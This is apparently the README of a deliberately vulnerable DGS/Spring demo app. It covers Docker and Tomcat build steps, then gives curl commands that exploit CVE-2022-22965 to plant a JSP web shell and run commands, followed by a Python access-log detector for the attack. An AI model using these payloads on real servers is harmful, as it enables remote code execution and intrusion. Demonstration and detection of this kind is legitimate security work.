muldos/dgs-skeleton

DGS (from Netflix) skeleton project

Introduction

To run the project locally (outside Docker), set the SHOWS_JSONDB_FOLDER environment variable (for example: /Path/to/dgs-skeleton/src/main/resources/data), then run:

mvn spring-boot:run

Build & run

Make sure the Docker daemon is running.

Build as a self-executable JAR

export PKG_VERSION=1.2.3
export PKG_TYPE=jar
jf mvn -Drevision=$PKG_VERSION -Dmaven.test.skip=true clean package
docker build --build-arg JAR_FILE_NAME=dgs-skeleton-$PKG_VERSION.$PKG_TYPE -t dgs-graphql:latest .
docker run -p 8080:8080 -v $PWD/src/main/resources/data:/var/db_data -d --name graphql-demo dgs-graphql:latest

Then browse to http://localhost:8080/graphiql

Build WAR for Tomcat

export PKG_VERSION=1.2.3
export PKG_TYPE=jar
export MVN_VIRTUAL_REPO=dro-backend-maven-virtual
jf mvnc --repo-resolve-releases=$MVN_VIRTUAL_REPO --repo-deploy-releases=$MVN_VIRTUAL_REPO --repo-resolve-snapshots=$MVN_VIRTUAL_REPO  --repo-deploy-snapshots=$MVN_VIRTUAL_REPO
jf mvn -Drevision=$PKG_VERSION -Dmaven.test.skip=true -f pom-war.xml clean package deploy
cp ./target/dgs-skeleton-webapp-$PKG_VERSION.$PKG_TYPE ./target/jfrog-demo.war
docker build --build-arg WAR_FILE_NAME=jfrog-demo.war -f DockerfileTomcat -t dgs-graphql-tomcat:latest .
docker run -p 8080:8080 -v $PWD/src/main/resources/data:/var/db_data -d --name graphql-demo dgs-graphql-tomcat:latest

Then browse to http://localhost:8080/jfrog-demo/graphiql

If this version contains the vulnerability CVE-2022-22965, you can then exploit it as follows:

First run

curl -H "Accept: text/html;" "http://localhost:8080/jfrog-demo/vulnerable-path?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

This changes the Tomcat valve configuration (its pattern, suffix, directory, prefix and fileDateFormat properties).

Then create the web shell

curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/jfrog-demo/vulnerable-path"

And run commands using

http://localhost:8080/shell.jsp?1337=ls%20-al
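
A defender-side check for the first request above, as an added example that is not part of this repository: it scans access-log lines for query parameters whose names walk from `class` into `classLoader`, decoding percent-encoded names first so that an encoded dot does not hide the path from the match. The function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names that bind from "class" into the class loader,
# e.g. class.module.classLoader.resources... (dot or bracket notation).
BINDING_PATH = re.compile(r"^class\s*(\.|\[).*classloader", re.IGNORECASE)
# Request line inside a common/combined access-log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return the query parameter names in a request target that match the binding path."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes names, so "class%2Emodule" is seen as "class.module".
    return [name for name, _ in parse_qsl(query, keep_blank_values=True) if BINDING_PATH.match(name)]


def scan_access_log(lines):
    """Return (line_number, method, [parameter names]) for each flagged log line."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            flagged.append((number, match.group("method"), hits))
    return flagged


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /jfrog-demo/graphiql HTTP/1.1" 200 1532',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /jfrog-demo/vulnerable-path?'
    'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'
    '&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell HTTP/1.1" 200 12',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /jfrog-demo/vulnerable-path?'
    'class%2Emodule%2EclassLoader%2Eresources%2Econtext%2Eparent%2Epipeline%2Efirst%2Edirectory=x HTTP/1.1" 200 12',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /jfrog-demo/items?classification=a HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for number, method, names in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {method} request binds {len(names)} class-loader parameter(s)")
```

Parameters sent in a POST body do not appear in an access log, so the same name check also belongs in a request filter or WAF rule.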

References
